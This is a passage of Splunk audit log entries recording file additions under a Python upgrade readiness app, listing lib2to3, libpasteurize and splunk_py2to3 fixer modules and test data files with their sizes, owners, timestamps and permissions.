action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_fullargspec.py", isdir=0, size=438, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.067, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_features.py", isdir=0, size=2675, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.061, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_division.py", isdir=0, size=904, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.057, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_annotations.py", isdir=0, size=1581, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.053, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_add_future_standard_library_import.py", isdir=0, size=663, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.049, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_add_all_future_builtins.py", isdir=0, size=1269, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.045, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_add_all__future__imports.py", isdir=0, size=676, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.040, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/feature_base.py", isdir=0, size=1723, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.035, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/__init__.py", isdir=0, size=3719, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.830, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/main.py", isdir=0, size=8186, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.826, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.821, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/__init__.py", isdir=0, size=31, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.817, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/splunk_py2to3/fixes/fix_spl_unicode.py", isdir=0, size=387, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.812, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/splunk_py2to3/fixes/fix_spl_ospath.py", isdir=0, size=6656, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.808, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/splunk_py2to3/fixes/fix_spl_floor.py", isdir=0, size=1893, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.804, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/splunk_py2to3/fixes/fix_spl_ceil.py", isdir=0, size=1875, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.800, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/splunk_py2to3/fixes/__init__.py", isdir=0, size=47, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.695, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/splunk_py2to3/testPy2to3_2.py", isdir=0, size=24, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.691, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/splunk_py2to3/testPy2to3.py", isdir=0, size=43, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.687, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/splunk_py2to3/lib2to3Runner.py", isdir=0, size=3166, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.684, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/splunk_py2to3/fixes", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.680, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/splunk_py2to3/__init__.py", isdir=0, size=47, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.676, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_zip.py", isdir=0, size=1289, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.672, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_xreadlines.py", isdir=0, size=689, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.667, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_xrange.py", isdir=0, size=2694, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.663, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_ws_comma.py", isdir=0, size=1090, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.659, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_urllib.py", isdir=0, size=8353, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.655, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_unicode.py", isdir=0, size=1256, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.651, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_types.py", isdir=0, size=1774, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.647, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_tuple_params.py", isdir=0, size=5565, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.643, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_throw.py", isdir=0, size=1582, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.639, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_sys_exc.py", isdir=0, size=1034, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.633, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_standarderror.py", isdir=0, size=449, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.628, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_set_literal.py", isdir=0, size=1697, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.624, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_repr.py", isdir=0, size=613, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.620, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_renames.py", isdir=0, size=2221, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.616, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_reload.py", isdir=0, size=1172, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.610, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_reduce.py", isdir=0, size=837, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.605, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_raw_input.py", isdir=0, size=454, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.600, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_raise.py", isdir=0, size=2926, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.595, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_print.py", isdir=0, size=2844, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.591, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_paren.py", isdir=0, size=1227, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.586, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_operator.py", isdir=0, size=3426, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.581, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_numliterals.py", isdir=0, size=768, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.577, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_nonzero.py", isdir=0, size=591, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.572, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_next.py", isdir=0, size=3174, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.568, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_ne.py", isdir=0, size=571, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.564, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_methodattrs.py", isdir=0, size=606, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.559, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_metaclass.py", isdir=0, size=8197, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.556, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_map.py", isdir=0, size=3640, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.551, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_long.py", isdir=0, size=476, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.547, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_itertools_imports.py", isdir=0, size=2086, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.543, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_itertools.py", isdir=0, size=1548, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.539, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_isinstance.py", isdir=0, size=1608, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.535, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_intern.py", isdir=0, size=1235, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.530, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_input.py", isdir=0, size=708, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.525, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_imports2.py", isdir=0, size=289, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.521, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_imports.py", isdir=0, size=5684, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.517, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_import.py", isdir=0, size=3256, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.512, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_idioms.py", isdir=0, size=4876, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.507, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_has_key.py", isdir=0, size=3196, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.503, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_getcwdu.py", isdir=0, size=451, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.499, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_future.py", isdir=0, size=547, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.494, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_funcattrs.py", isdir=0, size=644, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.491, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_filter.py", isdir=0, size=2651, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.487, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_exitfunc.py", isdir=0, size=2495, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.482, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_execfile.py", isdir=0, size=2048, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.477, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_exec.py", isdir=0, size=979, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.473, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_except.py", isdir=0, size=3344, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.467, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_dict.py", isdir=0, size=3760, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.462, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_buffer.py", isdir=0, size=590, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.456, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_basestring.py", isdir=0, size=320, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.449, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_asserts.py", isdir=0, size=984, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.444, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/fix_apply.py", isdir=0, size=2430, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:51.438, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/fixes/__init__.py", isdir=0, size=47, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.932, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/fixers/myfixes/fix_preorder.py", isdir=0, size=127, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.927, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/fixers/myfixes/fix_parrot.py", isdir=0, size=347, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.924, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/fixers/myfixes/fix_last.py", isdir=0, size=125, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.919, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/fixers/myfixes/fix_first.py", isdir=0, size=124, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.915, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/fixers/myfixes/fix_explicit.py", isdir=0, size=123, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.909, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/fixers/myfixes/__init__.py", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.904, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/fixers/parrot_example.py", isdir=0, size=23, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.901, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/fixers/no_fixer_cls.py", isdir=0, size=75, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.897, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/fixers/myfixes", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.893, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/fixers/bad_order.py", isdir=0, size=89, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.788, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/py3_test_grammar.py", isdir=0, size=30862, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.783, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/py2_test_grammar.py", isdir=0, size=30980, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.780, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/infinite_recursion.py", isdir=0, size=93071, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.776, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/fixers", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.772, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/false_encoding.py", isdir=0, size=40, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.768, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/different_encoding.py", isdir=0, size=230, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:50.765, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/lib2to3/tests/data/crlf.py", isdir=0, size=47, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] 